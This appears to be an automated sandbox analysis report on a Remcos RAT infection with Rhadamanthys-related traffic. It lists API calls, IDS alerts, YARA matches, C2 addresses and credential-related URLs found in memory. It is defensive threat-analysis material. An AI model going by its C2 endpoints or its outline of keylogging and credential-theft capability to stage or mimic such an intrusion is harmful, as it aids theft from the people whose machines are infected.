                  Source: Binary string: your_package_name.pdb source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp, task.exe, 00000008.00000003.1472143930.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp, task.exe, 0000001E.00000002.4491311882.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: wkernelbase.pdbUGP source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wkernel32.pdbUGP source: task.exe, 00000019.00000003.1667788844.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1667935272.0000000002C70000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676696250.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676535563.0000000005430000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: expand.exe, 00000006.00000003.1433042313.000000000482F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1572618363.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000008.00000002.1571419937.0000000000402000.00000002.00000001.01000000.00000005.sdmp, task.exe, 00000008.00000000.1439408986.0000000000402000.00000002.00000001.01000000.00000005.sdmp, task.exe, 00000016.00000000.1579511832.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000016.00000002.4486274195.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000018.00000000.1650674244.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000019.00000002.1675825905.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001A.00000000.1651000866.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001B.00000000.1652070836.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001E.00000002.4486356902.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001E.00000000.1662738715.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.* source: task.exe, 0000001A.00000002.1666589979.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\System32\msiexec.exe File opened: z:
                  Source: C:\Windows\System32\msiexec.exe File opened: x:
                  Source: C:\Windows\System32\msiexec.exe File opened: v:
                  Source: C:\Windows\System32\msiexec.exe File opened: t:
                  Source: C:\Windows\System32\msiexec.exe File opened: r:
                  Source: C:\Windows\System32\msiexec.exe File opened: p:
                  Source: C:\Windows\System32\msiexec.exe File opened: n:
                  Source: C:\Windows\System32\msiexec.exe File opened: l:
                  Source: C:\Windows\System32\msiexec.exe File opened: j:
                  Source: C:\Windows\System32\msiexec.exe File opened: h:
                  Source: C:\Windows\System32\msiexec.exe File opened: f:
                  Source: C:\Windows\System32\msiexec.exe File opened: b:
                  Source: C:\Windows\System32\msiexec.exe File opened: y:
                  Source: C:\Windows\System32\msiexec.exe File opened: w:
                  Source: C:\Windows\System32\msiexec.exe File opened: u:
                  Source: C:\Windows\System32\msiexec.exe File opened: s:
                  Source: C:\Windows\System32\msiexec.exe File opened: q:
                  Source: C:\Windows\System32\msiexec.exe File opened: o:
                  Source: C:\Windows\System32\msiexec.exe File opened: m:
                  Source: C:\Windows\System32\msiexec.exe File opened: k:
                  Source: C:\Windows\System32\msiexec.exe File opened: i:
                  Source: C:\Windows\System32\msiexec.exe File opened: g:
                  Source: C:\Windows\System32\msiexec.exe File opened: e:
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File opened: c:
                  Source: C:\Windows\System32\msiexec.exe File opened: a:
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8FB0E1 FindFirstFileExW,8_2_6C8FB0E1
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE9B0E1 FindFirstFileExW,22_2_6FE9B0E1
                  Source: C:\Users\user\task.exeCode function: 22_2_0006BF45 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,22_2_0006BF45
                  Source: C:\Users\user\task.exeCode function: 22_2_0006919E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_0006919E
                  Source: C:\Users\user\task.exeCode function: 22_2_00068290 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,22_2_00068290
                  Source: C:\Users\user\task.exeCode function: 22_2_000672F0 FindFirstFileW,FindNextFileW,22_2_000672F0
                  Source: C:\Users\user\task.exeCode function: 22_2_0007A467 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,22_2_0007A467
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B6E8 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0006B6E8
                  Source: C:\Users\user\task.exeCode function: 22_2_000A97E9 FindFirstFileExA,22_2_000A97E9
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B903 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0006B903
                  Source: C:\Users\user\task.exeCode function: 22_2_00068D46 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_00068D46
                  Source: C:\Users\user\task.exeCode function: 22_2_00077DE7 FindFirstFileW,FindNextFileW,FindNextFileW,22_2_00077DE7
                  Source: C:\Users\user\task.exeCode function: 22_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,22_2_100010F1
                  Source: C:\Users\user\task.exeCode function: 22_2_10006580 FindFirstFileExA,22_2_10006580
                  Source: C:\Users\user\task.exeCode function: 24_2_0040AE51 FindFirstFileW,FindNextFileW,24_2_0040AE51
                  Source: C:\Users\user\task.exeCode function: 22_2_0006771B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,22_2_0006771B
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                  Source: chrome.exeMemory has grown: Private usage: 18MB later: 25MB

                  Networking

                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49713 -> 179.43.171.197:3393
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49715 -> 179.43.171.197:3393
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49714 -> 179.43.171.197:3393
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49716 -> 179.43.171.197:3393
                  Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 179.43.171.196:5982 -> 192.168.2.9:49718
                  Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 179.43.171.196:5982 -> 192.168.2.9:49733
                  Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 179.43.171.196:5982 -> 192.168.2.9:49739
                  Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 179.43.171.196:443 -> 192.168.2.9:49740
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 179.43.171.196 5982
                  Source: Malware configuration extractorURLs: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna
                  Source: Malware configuration extractorURLs: rm.anonbaba.net
                  Source: global trafficTCP traffic: 179.43.171.196 ports 5982,2,443,5,8,9
                  Source: global trafficTCP traffic: 192.168.2.9:49713 -> 179.43.171.197:3393
                  Source: global trafficTCP traffic: 192.168.2.9:49718 -> 179.43.171.196:5982
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 129.6.15.28 129.6.15.28
                  Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                  Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: PLI-ASCH PLI-ASCH
                  Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49717 -> 178.237.33.50:80
                  Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 179.43.171.196:5982 -> 192.168.2.9:49733
                  Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 179.43.171.196:5982 -> 192.168.2.9:49739
                  Source: unknownTCP traffic detected without corresponding DNS query: 179.43.171.196
                  Source: C:\Users\user\task.exeCode function: 22_2_00079664 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,22_2_00079664
                  Source: task.exe, 00000018.00000003.1683160704.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: task.exe, 00000018.00000003.1683160704.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: task.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: task.exe, 00000016.00000002.4496169757.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: task.exe, 00000016.00000002.4496169757.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: rm.anonbaba.net
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: global trafficDNS traffic detected: DNS query: time-a-g.nist.gov
                  Source: global trafficDNS traffic detected: DNS query: ts1.aco.net
                  Source: global trafficDNS traffic detected: DNS query: ntp.nict.jp
                  Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
                  Source: global trafficDNS traffic detected: DNS query: ntp1.net.berkeley.edu
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: svchost.exe, 00000020.00000003.1949101503.000001BE85629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0
                  Source: svchost.exe, 00000020.00000003.1949101503.000001BE85629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.01:
                  Source: task.exe, 00000016.00000003.1637474365.0000000003660000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647985043.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647419384.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: task.exe, 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, task.exe, 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, task.exe, 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, task.exe, 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1656628346.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: task.exe, 0000001B.00000002.1656628346.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: task.exe, 00000018.00000002.1683843310.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: svchost.exe, 0000001F.00000002.1764768294.000000000330C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.1764466512.0000000000C7C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.2169208927.000001BE856B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2171115892.000001BE8295E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna
                  Source: svchost.exe, 0000001F.00000002.1764768294.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnakernelbasentdllkernel32GetProcessMitigati
                  Source: svchost.exe, 00000020.00000002.2171115892.000001BE8295E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnas
                  Source: svchost.exe, 0000001F.00000002.1764466512.0000000000C7C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnax
                  Source: svchost.exe, 00000020.00000003.2169208927.000001BE856B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnaymb
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: msedge.exe, 00000026.00000002.1935253683.00001C0003170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
                  Source: svchost.exe, 0000001F.00000003.1695689800.000000000339F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                  Source: svchost.exe, 0000001F.00000003.1695689800.000000000339F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: task.exe, 00000018.00000003.1666212847.0000000002134000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683160704.0000000000AFD000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1665557177.0000000002131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: task.exe, 00000018.00000003.1666212847.0000000002134000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1665557177.0000000002131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: task.exe, 00000018.00000003.1666212847.0000000002134000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1665557177.0000000002131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: task.exe, 00000018.00000002.1685293190.000000000212D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683033412.000000000212C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683064834.000000000212C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683263384.000000000212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_i__
                  Source: task.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: msedge.exe, 00000026.00000002.1935253683.00001C0003170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: task.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 179.43.171.196:443 -> 192.168.2.9:49740 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Users\user\task.exeCode function: 22_2_00069E55 SetWindowsHookExA 0000000D,00069E3E,0000000022_2_00069E55
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B2B5 OpenClipboard,GetClipboardData,CloseClipboard,22_2_0006B2B5
                  Source: C:\Users\user\task.exeCode function: 22_2_00074C52 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,22_2_00074C52
                  Source: C:\Users\user\task.exeCode function: 24_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_0040987A
                  Source: C:\Users\user\task.exeCode function: 24_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004098E2
                  Source: C:\Users\user\task.exeCode function: 22_2_00069F7D GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,22_2_00069F7D
                  Source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_655acf23-d
                  Source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_d8b5a7e2-6
                  Source: Yara matchFile source: 31.3.svchost.exe.5430000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.3.task.exe.2b50000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.3.task.exe.2d70000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.3.svchost.exe.5430000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.3.task.exe.2d70000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.3.svchost.exe.5430000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.3.svchost.exe.5650000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 7340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2148, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\task.exeCode function: 22_2_0007AC11 SystemParametersInfoW,22_2_0007AC11

                  System Summary

                  Source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
